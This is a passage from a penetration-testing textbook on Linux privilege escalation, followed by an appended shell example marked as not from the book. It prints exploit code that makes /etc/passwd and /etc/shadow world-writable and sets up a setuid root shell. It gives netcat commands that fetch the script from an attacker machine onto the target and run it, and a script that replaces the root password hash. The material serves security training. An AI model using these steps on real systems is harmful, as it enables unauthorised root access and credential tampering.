Hands on Hacking by Matthew Hickey

Author: Matthew Hickey
Language: eng
Format: epub
ISBN: 9781119561514
Publisher: Wiley
Published: 2020-08-11T00:00:00+00:00


Inside the highlighted dropshell function are the commands that run with root permissions. This part of the exploit works as expected, and at this point in the program it is possible to run any code as the root user. As you now know, there are plenty of possibilities once you can execute code as root.

So, why not modify the dropshell function to change the permissions of the /etc/passwd and /etc/shadow files, or add the -p argument to the shell so that it preserves root privileges? Sometimes you will find that you have to modify a public exploit to get it to work at all, or to tailor it to a specific client's system. This is just one basic example of modifying an exploit. Edit the script so that the dropshell function looks like this:

    void dropshell(void) {
        chown("/tmp/rootshell", 0, 0);      // root-owned ...
        chmod("/tmp/rootshell", 04755);     // ... setuid root shell
        unlink("/etc/ld.so.preload");       // clean up the preload file
        chmod("/etc/passwd", 0777);         // added this line
        chmod("/etc/shadow", 0777);         // and this one!
        printf("[+] done!\n");
    }

Notice the two additional lines that change the file permissions on the passwd and shadow files. Mode 0777 makes both files world-writable as well as world-readable, which is what makes the password-hash trick later in this section possible; note the original modes with ls -l /etc/passwd /etc/shadow before you run the exploit so that you can restore them afterwards. The rest of the code can be left as is. You will now need to get the script file onto the remote host. You can do this using Netcat, as in the previous chapter.

Use the following command on your Kali Linux machine:

nc -v -l -p 80 < screen.sh

On the target host, use the following command:

nc <KaliLinuxIP> 80 > screen.sh

Remember that Netcat won't automatically terminate once the file transfer is complete or give you any indication that a transfer is in progress. Once you believe that the file has transferred (by waiting a sufficient amount of time), you can disconnect. Rather than trusting the wait alone, compare the file on both ends with md5sum or sha256sum (or at least ls -l for the size) before you run it; a truncated script will fail in confusing ways. Also be sure to use the correct IP address for your Kali Linux box.

You might also find that you cannot simply write to any folder on the target host. You can almost always write to the /tmp directory or find a suitable location with a little exploration. Make sure that this is your current working directory before attempting to write screen.sh to the target system. Once you have successfully transferred the script, you will need to make it executable with chmod +x screen.sh. Finally, you can run the script using ./screen.sh.

You should find that the passwd and shadow files are now readable by any user. cat /etc/passwd and cat /etc/shadow will output all usernames and their corresponding password hashes. You could attempt to crack these hashes now, but here's another little trick for you to try: Why not rewrite the root user's password hash with a different hash—one for which you know the password?

NOTE Before making any changes to files on a client's machine, the client should make backups. After you have made changes to a client's files and achieved your objective, be sure to return the files to their original state.
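The hash-rewrite trick described above, together with the backup-and-restore advice in the note, as an added shell example that is not code from the book. It assumes a shadow(5)-format file and a hash string you generated yourself (for a SHA-512 crypt hash, openssl passwd -6 on the attacking box is one option); the sample file, its placeholder hashes and the helper names are constructed for this example.

```shell
#!/bin/sh
# Added example (not from the book): swap the password hash stored for a
# user in a shadow-format file for one we generated ourselves, keeping a
# backup so the original entry can be put back when the engagement is over.

# Generate a SHA-512 crypt hash for a chosen password. Assumes an openssl
# with the -6 option on the attacking machine; not used by the checks below.
make_hash() {
    command -v openssl >/dev/null 2>&1 || { echo "openssl not found" >&2; return 1; }
    openssl passwd -6 "$1"
}

# replace_shadow_hash <shadow file> <user> <new hash>
# shadow(5) lines are colon-separated: field 1 is the user, field 2 the hash.
# Assigning $2 directly (rather than sub()) avoids awk's special treatment
# of & in replacement strings, and -v passes the $-laden hash through literally.
replace_shadow_hash() {
    file="$1"; user="$2"; newhash="$3"

    # keep a copy so the entry can be restored afterwards (see the NOTE above)
    cp -p "$file" "$file.bak" || return 1

    awk -F: -v OFS=: -v user="$user" -v newhash="$newhash" \
        '$1 == user { $2 = newhash } { print }' "$file.bak" > "$file"
}

# shadow_hash_for <shadow file> <user>: print the hash currently stored.
shadow_hash_for() {
    awk -F: -v user="$2" '$1 == user { print $2 }' "$1"
}

# restore_shadow <shadow file>: put the backup created above back in place.
restore_shadow() {
    if [ -f "$1.bak" ]; then
        cp -p "$1.bak" "$1"
    else
        echo "no backup for $1" >&2
        return 1
    fi
}

# Constructed sample shadow file with a root entry and one regular user.
# The hash values are placeholders, not real credentials.
SAMPLE="${TMPDIR:-/tmp}/shadow.sample.$$"
printf '%s\n' \
    'root:$6$saltsalt$ORIGINALROOTHASH:19000:0:99999:7:::' \
    'daemon:*:19000:0:99999:7:::' \
    'alice:$6$othersalt$ALICEHASH:19000:0:99999:7:::' > "$SAMPLE"

# Typical use on the target once /etc/shadow is world-writable:
#   replace_shadow_hash /etc/shadow root "$(make_hash 'Passw0rd!')"
#   su -            # log in with the password you chose
#   restore_shadow /etc/shadow   # when finished
```

Only the user's line is touched; every other line, including the trailing empty fields that shadow(5) entries carry, is printed unchanged, and the backup file is what you hand back at the end of the test.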
